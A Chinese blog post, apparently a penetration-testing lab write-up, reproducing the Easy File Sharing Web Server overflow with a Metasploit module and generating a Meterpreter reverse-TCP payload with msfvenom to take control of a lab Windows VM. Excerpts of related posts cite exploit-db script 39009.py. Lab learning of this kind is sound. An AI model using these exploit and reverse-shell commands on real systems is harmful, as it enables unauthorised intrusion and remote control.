easy file sharing web server 复现 + msf被控端与主控端使用

原创 已于 2023-12-20 11:17:02 修改 · 676 阅读 · 9 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#测试工具 #web安全 #安全
于 2023-12-20 11:15:50 首次发布
文章讲述了如何在Windows系统中利用EasyFileSharing服务漏洞,通过Metasploit执行Meterpreter攻击并获取管理员权限。

easy file sharing web server 复现

攻击机:192.168.232.133

靶机:192.168.232.136

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

这里使用Msf利用该漏洞,选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块

设置好目标即可执行,成功

执行shell和whoami之后可以查看当前权限为管理员

使用calc命令即可弹计算器

Metasploit被控端与主控端的使用

攻击机:192.168.232.133

靶机:192.168.232.136

  1. 生成被控端

使用命令msfvenom -p windows/meterpreter/reverse_tcp

lhost=192.168.232.133 lport=5000 -f exe -o Desktop/payload.exe

  1. 生成主控端

依次执行命令

被控端放入靶机并双击执行

链接成功

尝试弹计算机

成功

退出命令行后使用download下载efssetup_20181文件,成功

最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
Easy File Sharing Web Server漏洞复现
m0_73952621的博客
01-03 611
4、在kali中执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.228.57 8080。1、在靶机(Win2003)中安装easy file sharing server口改为8080,URL为靶机ip。1、利用Nmap扫描发现靶机(Windows)运行了该服务。2、在kali中用nmap -sV扫描靶机IP。2、利用该漏洞,使得靶机运行计算器。打开靶机即可看到计算器被调用了。1、win2003靶机。
网络渗透测试复现任务easy file sharing server
m0_74897691的博客
01-02 550
2.将efssetup_2018.zip直接拖进Windows server 2016解压并安装,一直next即可,安装路径可以自己选择,安装成功后直接Try it!5.使用nmap -sV 192.168.239.134进行扫描(这里可能是由于Windows sever 2016安装时的配置问题或是口设置问题,没有扫成功)(一)靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。(一)生成主控被控
easy file sharing server
qq_74398661的博客
12-28 823
做一下这个漏洞复现1.在kali 和Windows这两台虚拟机上做并且是以NAT模式连接在同一网络2.先在Windows7虚拟机中安装easy file sharing server安装之后会出现以下界面,选择try it可知http服务用的口为80,服务器ip=192.168.110.130接下来使用kali用nmap工具扫描上面的IP 192.168.110.130查看各开放使用的服务名称和版本号80口和443口80口开放利用漏洞在kali中访问存在漏洞的服务口。
Easy File Sharing Web Server漏洞复现任务和Metasploit应用
hjhwdwdw的博客
12-26 708
实验环境:win7靶机,kali。
easy file sharing web server 漏洞复现及Metasploit被控主控使用
2201_75375302的博客
12-21 1192
VMware,kali-linux(整个复现过程命令框都得使用超级用户权限),win7(带Service pack 1的X64版本),easy file sharing web server软件(网上可查)​红框中随便挑一个镜像,安装好虚拟机win7后千万不能将分辨率调太高,不然会卡成PPT,下面是安装完win7后需要的配置,解决屏幕过小,虚拟机和主机之间文件拖拽的问题。win7环境配置: 由于微软更新了驱动程序签名算法,2019年开始弃用SHA1,改用SHA2。
简单漏洞渗透复现
cherry70的博客
12-22 1505
注意事项:想要实现Metasploit的具体应用,需要靶机运行payload.exe这个kali生成的执行文件,将kali中的payload.exe移到靶机中的相关方法,可以在网上搜查,我的虚拟机不能直接利用VMtools直接移动,所以我是利用网站来下载的。Metasploit框架是可以添加漏洞代码片段,就好比一个军火库,它里面有各种武器供大家使用,当然也有新的武器被研发出来,放到武器库里面后,都可以使用,这就是框架的好处,新的攻击代码可以比较容易的加入MSF框架供大家使用
Easy File Sharing Web Server 漏洞复现
2401_83943410的博客
10-28 390
发现800口version:Easy File Sharing Web Server httped 6.9该版本存在的缓冲区溢出漏洞。调用windows/remote/39009.py脚本 加上靶机ip地址 和口号。可见口为800口,靶机IP地址为192.168.45.138。lhost:kali的ip地址 lport:为5000口。-p或–payload参数用来指定要使用的Payload。2.使用kali工具nmap扫描靶机ip。随便输入用户名,网站是可以正常访问的。
easy file sharing server 漏洞如何复现
bjxlyy的博客
10-25 544
Easy File Sharing Web Server 6.9漏洞复现及生成主控被控应用
漏洞渗透测试easy file sharing server
qq_51926773的博客
11-07 3563
一,在靶机上安装easy file sharing server,安装启动好后,配置必要信息。 其中,upl填靶机的ip地址。 二,配置好相关信息后,进入kali,输入下面截图命令,获取easy file sharing server漏洞。 然后再输入命令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机IP。其中用39009漏洞进行实验。 回车后会发现靶机崩溃并允许计算机。 结束。 ...
复现任务A
weixin_62599268的博客
11-19 277
网络渗透测试——复现任务
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 622
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
远程控制Easy File Sharing Web Server
qq_38467991的博客
12-27 671
p接的是攻击的载荷类型,即针对Windows操作系统的Meterpreter反向TCP payload,Meterpreter是Metasploit框架中的一种强大的交互式Shell,可以在远程系统上执行各种命令和操作。攻击者进行对目标口的攻击,这里特地标明使用python2,因为电脑可能安装有python2和python3两个版本的python因此虚拟机这边率先使用python3会导致语法上的不兼容从而导致无法执行这个python2写的版本(一句话:此处没有向下兼容)-o接的是输出文件的路径和名称。
渗透测试实验:利用Easy File Sharing Server漏洞获取Windows XP控制权
Bruce_xiaowei的博客
01-09 965
本文详细介绍了一次针对Windows XP系统的渗透测试实验。实验中,攻击者利用Easy File Sharing Server软件的已知漏洞,成功在目标系统上建立了Meterpreter会话,从而获得了对目标机器的控制权。实验环境包括Kali Linux攻击机和Windows XP靶机。1.引言渗透测试是评估系统安全性的重要手段。通过模拟黑客攻击,可以发现并修复潜在的安全漏洞。本次实验选取了Windows XP系统作为靶机,该系统因其广泛的使用和已知的安全问题而成为研究对象。2.实验环境。
Easy File Sharing Web Server 漏洞利用实战:从扫描到 Meterpreter 控制
最新发布
2403_87493365的博客
12-18 576
首先在目标机启动 Easy File Sharing Web Server,从软件界面可看到其默认开启 8000 口(HTTP)和 443 口(SSL),URL 为http://192.xxx.xx.1:8000。搜索结果中包含多个远程漏洞利用脚本,这里选择 39009.py(缓冲区溢出漏洞脚本),该脚本通过向目标发送超长字符串触发栈溢出,可实现远程代码执行。文件操作 pwd(当前目录)、ls(列文件)、upload/download(上传 / 下载)
Easy File Sharing Web Server
2401_87432358的博客
12-15 234
1. 启动 **Easy File Sharing Web Server**,在口(port)输入框中填入`8000`,并在下方URL中补充`:8000`,依次点击`Start`和`GO`按钮,即可打开对应网页。2. 打开虚拟机,执行`nmap -sV`指令对目标主机进行口扫描,可发现`8000`口运行着 **Easy File Sharing Web Server http 6.9** 服务。5. 攻击成功后,将自动获取目标主机的计算机控制权限(弹出被控界面)。
windows渗透测试
Aluxian_的博客
05-25 9987
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测
easy file sharing server 漏洞复现
cheng___yu_的博客
12-14 3517
一、漏洞详情 Easy File Sharing FTP Server 是一款 FTP 服务程序。 Easy File Sharing FTP Server 处理 PASS 命令存在问题,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 提交超长字符串作为 PASS 命令参数,可导致触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令 二、工具 靶机: 192.168.118.132、win10(把 windows 安全中心关闭)、安装 easy file sharing s
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 2447
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hhhalloWelt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值